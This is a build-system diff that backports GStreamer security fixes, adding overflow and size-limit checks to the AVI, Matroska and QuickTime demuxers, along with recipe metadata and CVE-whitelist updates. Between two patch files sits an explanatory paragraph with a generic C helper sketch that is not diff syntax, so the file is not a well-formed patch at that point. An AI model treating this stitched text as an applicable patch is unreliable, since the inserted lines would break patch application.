+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -3933,7 +3933,8 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ } else {
+ guint8 *outdata = NULL;
+ gsize buf_size, size;
+- guint32 block_samples, flags, crc, blocksize;
++ guint32 block_samples, flags, crc;
++ gsize blocksize;
+ GstAdapter *adapter;
+
+ adapter = gst_adapter_new ();
+@@ -3974,6 +3975,13 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ return GST_FLOW_ERROR;
+ }
+
++ if (blocksize > G_MAXSIZE - WAVPACK4_HEADER_SIZE) {
++ GST_ERROR_OBJECT (element, "Too big wavpack buffer");
++ gst_buffer_unmap (*buf, &map);
++ g_object_unref (adapter);
++ return GST_FLOW_ERROR;
++ }
++
+ g_assert (newbuf == NULL);
+
+ newbuf =
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch
new file mode 100644
index 0000000000..99dbb2b1b0
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch
@@ -0,0 +1,69 @@
+From f503caad676971933dc0b52c4b313e5ef0d6dbb0 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 12:00:48 +0300
+Subject: [PATCH] avidemux: Fix integer overflow resulting in heap corruption
+ in DIB buffer inversion code
+
+Check that width*bpp/8 doesn't overflow a guint and also that
+height*stride fits into the provided buffer without overflowing.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1921
+
+See https://gstreamer.freedesktop.org/security/sa-2022-0001.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1224
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2608>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/f503caad676971933dc0b52c4b313e5ef0d6dbb0
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/avi/gstavidemux.c | 17 ++++++++++++++---
+ 1 file changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/gst/avi/gstavidemux.c b/gst/avi/gstavidemux.c
+index eafe865494c..0d18a6495c7 100644
+--- a/gst/avi/gstavidemux.c
++++ b/gst/avi/gstavidemux.c
+@@ -4973,8 +4973,8 @@ swap_line (guint8 * d1, guint8 * d2, guint8 * tmp, gint bytes)
+ static GstBuffer *
+ gst_avi_demux_invert (GstAviStream * stream, GstBuffer * buf)
+ {
+- gint y, w, h;
+- gint bpp, stride;
++ guint y, w, h;
++ guint bpp, stride;
+ guint8 *tmp = NULL;
+ GstMapInfo map;
+ guint32 fourcc;
+@@ -5001,12 +5001,23 @@ gst_avi_demux_invert (GstAviStream * stream, GstBuffer * buf)
+ h = stream->strf.vids->height;
+ w = stream->strf.vids->width;
+ bpp = stream->strf.vids->bit_cnt ? stream->strf.vids->bit_cnt : 8;
++
++ if ((guint64) w * ((guint64) bpp / 8) > G_MAXUINT - 4) {
++ GST_WARNING ("Width x stride overflows");
++ return buf;
++ }
++
++ if (w == 0 || h == 0) {
++ GST_WARNING ("Zero width or height");
++ return buf;
++ }
++
+ stride = GST_ROUND_UP_4 (w * (bpp / 8));
+
+ buf = gst_buffer_make_writable (buf);
+
+ gst_buffer_map (buf, &map, GST_MAP_READWRITE);
+- if (map.size < (stride * h)) {
++ if (map.size < ((guint64) stride * (guint64) h)) {
+ GST_WARNING ("Buffer is smaller than reported Width x Height x Depth");
+ gst_buffer_unmap (buf, &map);
+ return buf;
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch
new file mode 100644
index 0000000000..ebffbc473d
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch
@@ -0,0 +1,214 @@
+From ad6012159acf18c6b5c0f4edf037e8c9a2dbc966 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 11:24:37 +0300
+Subject: [PATCH] matroskademux: Fix integer overflows in zlib/bz2/etc
+ decompression code
+
+Various variables were of smaller types than needed and there were no
+checks for any overflows when doing additions on the sizes. This is all
+checked now.
+
+In addition the size of the decompressed data is limited to 120MB now as
+any larger sizes are likely pathological and we can avoid out of memory
+situations in many cases like this.
+
+Also fix a bug where the available output size on the next iteration in
+the zlib/bz2 decompression code was provided too large and could
+potentially lead to out of bound writes.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1922, CVE-2022-1923, CVE-2022-1924, CVE-2022-1925
+
+https://gstreamer.freedesktop.org/security/sa-2022-0002.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1225
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2610>
+
+CVE: CVE-2022-1922 CVE-2022-1923 CVE-2022-1924 CVE-2022-1925
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/ad6012159acf18c6b5c0f4edf037e8c9a2dbc966
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/matroska/matroska-read-common.c | 76 +++++++++++++++----
+ 1 file changed, 61 insertions(+), 15 deletions(-)
+
+diff --git a/gst/matroska/matroska-read-common.c b/gst/matroska/matroska-read-common.c
+index eb317644cc5..6fadbba9567 100644
+--- a/gst/matroska/matroska-read-common.c
++++ b/gst/matroska/matroska-read-common.c
+@@ -70,6 +70,10 @@ typedef struct
+ gboolean audio_only;
+ } TargetTypeContext;
+
++/* 120MB as maximum decompressed data size. Anything bigger is likely
++ * pathological, and like this we avoid out of memory situations in many cases
++ */
++#define MAX_DECOMPRESS_SIZE (120 * 1024 * 1024)
+
+ static gboolean
+ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+@@ -77,19 +81,23 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ GstMatroskaTrackCompressionAlgorithm algo)
+ {
+ guint8 *new_data = NULL;
+- guint new_size = 0;
++ gsize new_size = 0;
+ guint8 *data = *data_out;
+- guint size = *size_out;
++ const gsize size = *size_out;
+ gboolean ret = TRUE;
+
++ if (size > G_MAXUINT32) {
++ GST_WARNING ("too large compressed data buffer.");
++ ret = FALSE;
++ goto out;
++ }
++
+ if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_ZLIB) {
+ #ifdef HAVE_ZLIB
+ /* zlib encoded data */
+ z_stream zstream;
+- guint orig_size;
+ int result;
+
+- orig_size = size;
+ zstream.zalloc = (alloc_func) 0;
+ zstream.zfree = (free_func) 0;
+ zstream.opaque = (voidpf) 0;
+@@ -99,8 +107,8 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ goto out;
+ }
+ zstream.next_in = (Bytef *) data;
+- zstream.avail_in = orig_size;
+- new_size = orig_size;
++ zstream.avail_in = size;
++ new_size = size;
+ new_data = g_malloc (new_size);
+ zstream.avail_out = new_size;
+ zstream.next_out = (Bytef *) new_data;
+@@ -114,10 +122,18 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ break;
+ }
+
++ if (new_size > G_MAXSIZE - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ result = Z_MEM_ERROR;
++ break;
++ }
++
+ new_size += 4096;
+ new_data = g_realloc (new_data, new_size);
+ zstream.next_out = (Bytef *) (new_data + zstream.total_out);
+- zstream.avail_out += 4096;
++ /* avail_out is an unsigned int */
++ g_assert (new_size - zstream.total_out <= G_MAXUINT);
++ zstream.avail_out = new_size - zstream.total_out;
+ } while (zstream.avail_in > 0);
+
+ if (result != Z_STREAM_END) {
+@@ -137,13 +153,11 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ #ifdef HAVE_BZ2
+ /* bzip2 encoded data */
+ bz_stream bzstream;
+- guint orig_size;
+ int result;
+
+ bzstream.bzalloc = NULL;
+ bzstream.bzfree = NULL;
+ bzstream.opaque = NULL;
+- orig_size = size;
+
+ if (BZ2_bzDecompressInit (&bzstream, 0, 0) != BZ_OK) {
+ GST_WARNING ("bzip2 initialization failed.");
+@@ -152,8 +166,8 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ }
+
+ bzstream.next_in = (char *) data;
+- bzstream.avail_in = orig_size;
+- new_size = orig_size;
++ bzstream.avail_in = size;
++ new_size = size;
+ new_data = g_malloc (new_size);
+ bzstream.avail_out = new_size;
+ bzstream.next_out = (char *) new_data;
+@@ -167,17 +181,31 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ break;
+ }
+
++ if (new_size > G_MAXSIZE - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ result = BZ_MEM_ERROR;
++ break;
++ }
++
+ new_size += 4096;
+ new_data = g_realloc (new_data, new_size);
+- bzstream.next_out = (char *) (new_data + bzstream.total_out_lo32);
+- bzstream.avail_out += 4096;
++ bzstream.next_out =
++ (char *) (new_data + ((guint64) bzstream.total_out_hi32 << 32) +
++ bzstream.total_out_lo32);
++ /* avail_out is an unsigned int */
++ g_assert (new_size - ((guint64) bzstream.total_out_hi32 << 32) +
++ bzstream.total_out_lo32 <= G_MAXUINT);
++ bzstream.avail_out =
++ new_size - ((guint64) bzstream.total_out_hi32 << 32) +
++ bzstream.total_out_lo32;
+ } while (bzstream.avail_in > 0);
+
+ if (result != BZ_STREAM_END) {
+ ret = FALSE;
+ g_free (new_data);
+ } else {
+- new_size = bzstream.total_out_lo32;
++ new_size =
++ ((guint64) bzstream.total_out_hi32 << 32) + bzstream.total_out_lo32;
+ }
+ BZ2_bzDecompressEnd (&bzstream);
+
+@@ -189,7 +217,13 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ } else if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_LZO1X) {
+ /* lzo encoded data */
+ int result;
+- int orig_size, out_size;
++ gint orig_size, out_size;
++
++ if (size > G_MAXINT) {
++ GST_WARNING ("too large compressed data buffer.");
++ ret = FALSE;
++ goto out;
++ }
+
+ orig_size = size;
+ out_size = size;
+@@ -203,6 +237,11 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ result = lzo1x_decode (new_data, &out_size, data, &orig_size);
+
+ if (orig_size > 0) {
++ if (new_size > G_MAXINT - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ result = LZO_ERROR;
++ break;
++ }
+ new_size += 4096;
+ new_data = g_realloc (new_data, new_size);
+ }
+@@ -221,6 +260,13 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ } else if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_HEADERSTRIP) {
+ /* header stripped encoded data */
+ if (enc->comp_settings_length > 0) {
++ if (size > G_MAXSIZE - enc->comp_settings_length
++ || size + enc->comp_settings_length > MAX_DECOMPRESS_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ ret = FALSE;
++ goto out;
++ }
++
+ new_data = g_malloc (size + enc->comp_settings_length);
+ new_size = size + enc->comp_settings_length;
+
+--
+GitLab
+
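
The guards added above follow one recurring pattern: before growing a decompression buffer, check that the addition cannot wrap and that the total stays under a hard cap. A generic sketch of that pattern (the cap value mirrors the patch, the helper itself is illustrative):

    #include <stdint.h>
    #include <stdlib.h>

    #define MAX_DECOMPRESS_SIZE (120 * 1024 * 1024)
    #define GROW_STEP 4096

    /* Grow *buf by GROW_STEP bytes, refusing to overflow size_t or to
     * exceed the cap. Returns 0 on success, -1 on failure; on failure the
     * original buffer and size are left untouched. */
    static int grow_buffer(uint8_t **buf, size_t *size)
    {
        uint8_t *tmp;

        if (*size > SIZE_MAX - GROW_STEP || *size + GROW_STEP > MAX_DECOMPRESS_SIZE)
            return -1;

        tmp = realloc(*buf, *size + GROW_STEP);
        if (tmp == NULL)
            return -1;

        *buf = tmp;
        *size += GROW_STEP;
        return 0;
    }
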
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch
new file mode 100644
index 0000000000..f4d38c270e
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch
@@ -0,0 +1,60 @@
+From 14d306da6da51a762c4dc701d161bb52ab66d774 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Mon, 30 May 2022 10:15:37 +0300
+Subject: [PATCH] qtdemux: Fix integer overflows in zlib decompression code
+
+Various variables were of smaller types than needed and there were no
+checks for any overflows when doing additions on the sizes. This is all
+checked now.
+
+In addition the size of the decompressed data is limited to 200MB now as
+any larger sizes are likely pathological and we can avoid out of memory
+situations in many cases like this.
+
+Also fix a bug where the available output size on the next iteration in
+the zlib decompression code was provided too large and could
+potentially lead to out of bound writes.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: tbd
+
+https://gstreamer.freedesktop.org/security/sa-2022-0003.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1225
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2610>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/14d306da6da51a762c4dc701d161bb52ab66d774
+CVE: CVE-2022-2122
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ gst/isomp4/qtdemux.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/gst/isomp4/qtdemux.c b/gst/isomp4/qtdemux.c
+index 7cc346b1e63..97ba0799a8d 100644
+--- a/gst/isomp4/qtdemux.c
++++ b/gst/isomp4/qtdemux.c
+@@ -7905,10 +7905,16 @@ qtdemux_inflate (void *z_buffer, guint z_length, guint * length)
+ break;
+ }
+
++ if (*length > G_MAXUINT - 4096 || *length > QTDEMUX_MAX_SAMPLE_INDEX_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ ret = Z_MEM_ERROR;
++ break;
++ }
++
+ *length += 4096;
+ buffer = (guint8 *) g_realloc (buffer, *length);
+ z.next_out = (Bytef *) (buffer + z.total_out);
+- z.avail_out += 4096;
++ z.avail_out += *length - z.total_out;
+ } while (z.avail_in > 0);
+
+ if (ret != Z_STREAM_END) {
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
index 75dd029109..831a317a82 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
@@ -1,9 +1,19 @@
require gstreamer1.0-plugins-common.inc
+DESCRIPTION = "'Good' GStreamer plugins"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues"
+
SRC_URI = " \
https://gstreamer.freedesktop.org/src/gst-plugins-good/gst-plugins-good-${PV}.tar.xz \
file://0001-qmlgl-ensure-Qt-defines-GLsync-to-fix-compile-on-som.patch \
file://0001-qt-include-ext-qt-gstqtgl.h-instead-of-gst-gl-gstglf.patch \
+ file://CVE-2021-3497.patch \
+ file://CVE-2021-3498.patch \
+ file://CVE-2022-1920.patch \
+ file://CVE-2022-1921.patch \
+ file://CVE-2022-1922-1923-1924-1925.patch \
+ file://CVE-2022-2122.patch \
"
SRC_URI[md5sum] = "c79b6c2f8eaadb2bb66615b694db399e"
@@ -30,6 +40,8 @@ X11DEPENDS = "virtual/libx11 libsm libxrender libxfixes libxdamage"
X11ENABLEOPTS = "-Dximagesrc=enabled -Dximagesrc-xshm=enabled -Dximagesrc-xfixes=enabled -Dximagesrc-xdamage=enabled"
X11DISABLEOPTS = "-Dximagesrc=disabled -Dximagesrc-xshm=disabled -Dximagesrc-xfixes=disabled -Dximagesrc-xdamage=disabled"
+QT5WAYLANDDEPENDS = "${@bb.utils.contains("DISTRO_FEATURES", "wayland", "qtwayland", "", d)}"
+
PACKAGECONFIG[bz2] = "-Dbz2=enabled,-Dbz2=disabled,bzip2"
PACKAGECONFIG[cairo] = "-Dcairo=enabled,-Dcairo=disabled,cairo"
PACKAGECONFIG[dv1394] = "-Ddv1394=enabled,-Ddv1394=disabled,libiec61883 libavc1394 libraw1394"
@@ -44,7 +56,7 @@ PACKAGECONFIG[libpng] = "-Dpng=enabled,-Dpng=disabled,libpng"
PACKAGECONFIG[libv4l2] = "-Dv4l2-libv4l2=enabled,-Dv4l2-libv4l2=disabled,v4l-utils"
PACKAGECONFIG[mpg123] = "-Dmpg123=enabled,-Dmpg123=disabled,mpg123"
PACKAGECONFIG[pulseaudio] = "-Dpulse=enabled,-Dpulse=disabled,pulseaudio"
-PACKAGECONFIG[qt5] = "-Dqt5=enabled,-Dqt5=disabled,qtbase qtdeclarative qtbase-native"
+PACKAGECONFIG[qt5] = "-Dqt5=enabled,-Dqt5=disabled,qtbase qtdeclarative qtbase-native ${QT5WAYLANDDEPENDS}"
PACKAGECONFIG[soup] = "-Dsoup=enabled,-Dsoup=disabled,libsoup-2.4"
PACKAGECONFIG[speex] = "-Dspeex=enabled,-Dspeex=disabled,speex"
PACKAGECONFIG[taglib] = "-Dtaglib=enabled,-Dtaglib=disabled,taglib"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
index d9ec82d887..afde9a013d 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
@@ -1,5 +1,9 @@
require gstreamer1.0-plugins-common.inc
+DESCRIPTION = "'Ugly GStreamer plugins"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-ugly/-/issues"
+
LIC_FILES_CHKSUM = "file://COPYING;md5=a6f89e2100d9b6cdffcea4f398e37343 \
file://tests/check/elements/xingmux.c;beginline=1;endline=21;md5=4c771b8af188724855cb99cadd390068"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
index 14b34a2808..9c7f0e078c 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
@@ -1,4 +1,6 @@
SUMMARY = "Python bindings for GStreamer 1.0"
+DESCRIPTION = "GStreamer Python binding overrides (complementing the bindings \
+provided by python-gi) "
HOMEPAGE = "http://cgit.freedesktop.org/gstreamer/gst-python/"
SECTION = "multimedia"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb
index 5f1b1d44fa..ed51a5693e 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb
@@ -29,3 +29,5 @@ GIR_MESON_DISABLE_FLAG = "disabled"
# Starting with 1.8.0 gst-rtsp-server includes dependency-less plugins as well
require gstreamer1.0-plugins-packaging.inc
+
+CVE_PRODUCT += "gst-rtsp-server"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
index 9d9b1b8757..af9b2c5a97 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
@@ -1,4 +1,5 @@
SUMMARY = "VA-API support to GStreamer"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
DESCRIPTION = "gstreamer-vaapi consists of a collection of VA-API \
based plugins for GStreamer and helper libraries: `vaapidecode', \
`vaapiconvert', and `vaapisink'."
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch
new file mode 100644
index 0000000000..e32f3c101f
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch
@@ -0,0 +1,33 @@
+From 1db36347d05d88835519368442e9aa89c64091ad Mon Sep 17 00:00:00 2001
+From: Seungha Yang <seungha@centricular.com>
+Date: Tue, 15 Sep 2020 00:54:58 +0900
+Subject: [PATCH] tests: seek: Don't use too strict timeout for validation
+
+Expected segment-done message might not be seen within expected
+time if system is not powerful enough.
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/625>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/gstreamer/gstreamer/commit?id=f44312ae5d831438fcf8041162079c65321c588c]
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+Signed-off-by: Jose Quaresma <quaresma.jose@gmail.com>
+---
+ tests/check/pipelines/seek.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/check/pipelines/seek.c b/tests/check/pipelines/seek.c
+index 28bb8846d..5f7447bc5 100644
+--- a/tests/check/pipelines/seek.c
++++ b/tests/check/pipelines/seek.c
+@@ -521,7 +521,7 @@ GST_START_TEST (test_loopback_2)
+
+ GST_INFO ("wait for segment done message");
+
+- msg = gst_bus_timed_pop_filtered (bus, (GstClockTime) 2 * GST_SECOND,
++ msg = gst_bus_timed_pop_filtered (bus, GST_CLOCK_TIME_NONE,
+ GST_MESSAGE_SEGMENT_DONE | GST_MESSAGE_ERROR);
+ fail_unless (msg, "no message within the timed window");
+ fail_unless_equals_string (GST_MESSAGE_TYPE_NAME (msg), "segment-done");
+--
+2.29.2
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
index 7afe56cd7b..14793b7fdf 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
@@ -22,6 +22,7 @@ SRC_URI = " \
file://0003-meson-Add-valgrind-feature.patch \
file://0004-meson-Add-option-for-installed-tests.patch \
file://0005-bufferpool-only-resize-in-reset-when-maxsize-is-larger.patch \
+ file://0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch \
"
SRC_URI[md5sum] = "beecf6965a17fb17fa3b262fd36df70a"
SRC_URI[sha256sum] = "692f037968e454e508b0f71d9674e2e26c78475021407fcf8193b1c7e59543c7"
@@ -40,7 +41,7 @@ PACKAGECONFIG[unwind] = "-Dlibunwind=enabled,-Dlibunwind=disabled,libunwind"
PACKAGECONFIG[dw] = "-Dlibdw=enabled,-Dlibdw=disabled,elfutils"
PACKAGECONFIG[bash-completion] = "-Dbash-completion=enabled,-Dbash-completion=disabled,bash-completion"
PACKAGECONFIG[tools] = "-Dtools=enabled,-Dtools=disabled"
-PACKAGECONFIG[setcap] = ",,libcap libcap-native"
+PACKAGECONFIG[setcap] = "-Dptp-helper-permissions=capabilities,,libcap libcap-native"
# TODO: put this in a gettext.bbclass patch
def gettext_oemeson(d):
@@ -74,4 +75,20 @@ FILES_${PN}-dbg += "${datadir}/gdb ${datadir}/gstreamer-1.0/gdb"
CVE_PRODUCT = "gstreamer"
+# CPE entries for gst-plugins-base are listed as gstreamer issues
+# so we need to ignore the false hits
+CVE_CHECK_WHITELIST += "CVE-2021-3522"
+
+# CPE entries for gst-plugins-good are listed as gstreamer issues
+# so we need to ignore the false hits
+CVE_CHECK_WHITELIST += "CVE-2021-3497"
+CVE_CHECK_WHITELIST += "CVE-2021-3498"
+CVE_CHECK_WHITELIST += "CVE-2022-1920"
+CVE_CHECK_WHITELIST += "CVE-2022-1921"
+CVE_CHECK_WHITELIST += "CVE-2022-1922"
+CVE_CHECK_WHITELIST += "CVE-2022-1923"
+CVE_CHECK_WHITELIST += "CVE-2022-1924"
+CVE_CHECK_WHITELIST += "CVE-2022-1925"
+CVE_CHECK_WHITELIST += "CVE-2022-2122"
+
require gstreamer1.0-ptest.inc
diff --git a/meta/recipes-multimedia/lame/lame_3.100.bb b/meta/recipes-multimedia/lame/lame_3.100.bb
index 7f8996fb52..d007e0a495 100644
--- a/meta/recipes-multimedia/lame/lame_3.100.bb
+++ b/meta/recipes-multimedia/lame/lame_3.100.bb
@@ -1,5 +1,6 @@
SUMMARY = "High quality MP3 audio encoder"
-HOMEPAGE = "http://lame.sourceforge.net/"
+DESCRIPTION = "LAME is an educational tool to be used for learning about MP3 encoding."
+HOMEPAGE = "https://lame.sourceforge.io/"
BUGTRACKER = "http://sourceforge.net/tracker/?group_id=290&atid=100290"
SECTION = "console/utils"
LICENSE = "LGPLv2+"
diff --git a/meta/recipes-multimedia/liba52/liba52_0.7.4.bb b/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
index 8ff8889b60..0ef5d947c3 100644
--- a/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
+++ b/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
@@ -1,4 +1,7 @@
SUMMARY = "ATSC A/52 surround sound stream decoder"
+DESCRIPTION = "Library for decoding ATSC A/52 streams. The A/52 standard \
+is used in a variety of applications, including digital television \
+and DVD. It is also known as AC-3."
HOMEPAGE = "http://liba52.sourceforge.net/"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
diff --git a/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch b/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch
new file mode 100644
index 0000000000..0d1d0dc381
--- /dev/null
+++ b/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch
@@ -0,0 +1,21 @@
+configure contains CFLAGS filtering code which was removing our prefix-map
+flags. We need those to generate reproducible binaries. Allow them through.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: libid3tag-0.15.1b/configure.ac
+===================================================================
+--- libid3tag-0.15.1b.orig/configure.ac
++++ libid3tag-0.15.1b/configure.ac
+@@ -99,6 +99,10 @@ do
+ -mno-cygwin)
+ shift
+ ;;
++ -fmacro-prefix-map*|-fdebug-prefix-map*)
++ CFLAGS="$CFLAGS $1"
++ shift
++ ;;
+ -m*)
+ arch="$arch $1"
+ shift
diff --git a/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb b/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
index 0312a610c0..80581765ac 100644
--- a/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
+++ b/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
@@ -15,6 +15,7 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/mad/libid3tag-${PV}.tar.gz \
file://0001-Fix-gperf-3.1-incompatibility.patch \
file://10_utf16.patch \
file://unknown-encoding.patch \
+ file://cflags_filter.patch \
"
UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/mad/files/libid3tag/"
UPSTREAM_CHECK_REGEX = "/projects/mad/files/libid3tag/(?P<pver>.*)/$"
diff --git a/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb b/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb
index 271c2a30a3..8f3b76a920 100644
--- a/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb
+++ b/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb
@@ -4,7 +4,7 @@ DESCRIPTION = "Bellagio is an opensource implementation of the Khronos OpenMAX \
HOMEPAGE = "http://omxil.sourceforge.net/"
LICENSE = "LGPLv2.1+"
-LICENSE_FLAGS = "commercial"
+LICENSE_FLAGS = "${@bb.utils.contains('PACKAGECONFIG', 'amr', 'commercial', '', d)}"
LIC_FILES_CHKSUM = "file://COPYING;md5=ae6f0f4dbc7ac193b50f323a6ae191cb \
file://src/omxcore.h;beginline=1;endline=27;md5=806b1e5566c06486fe8e42b461e03a90"
@@ -26,6 +26,10 @@ EXTRA_OECONF += "--disable-doc --disable-Werror"
PROVIDES += "virtual/libomxil"
+PACKAGECONFIG ??= ""
+
+PACKAGECONFIG[amr] = "--enable-amr,,"
+
#
# The .so files under ${libdir}/bellagio are not intended to be versioned and symlinked.
# Make sure they get packaged in the main package.
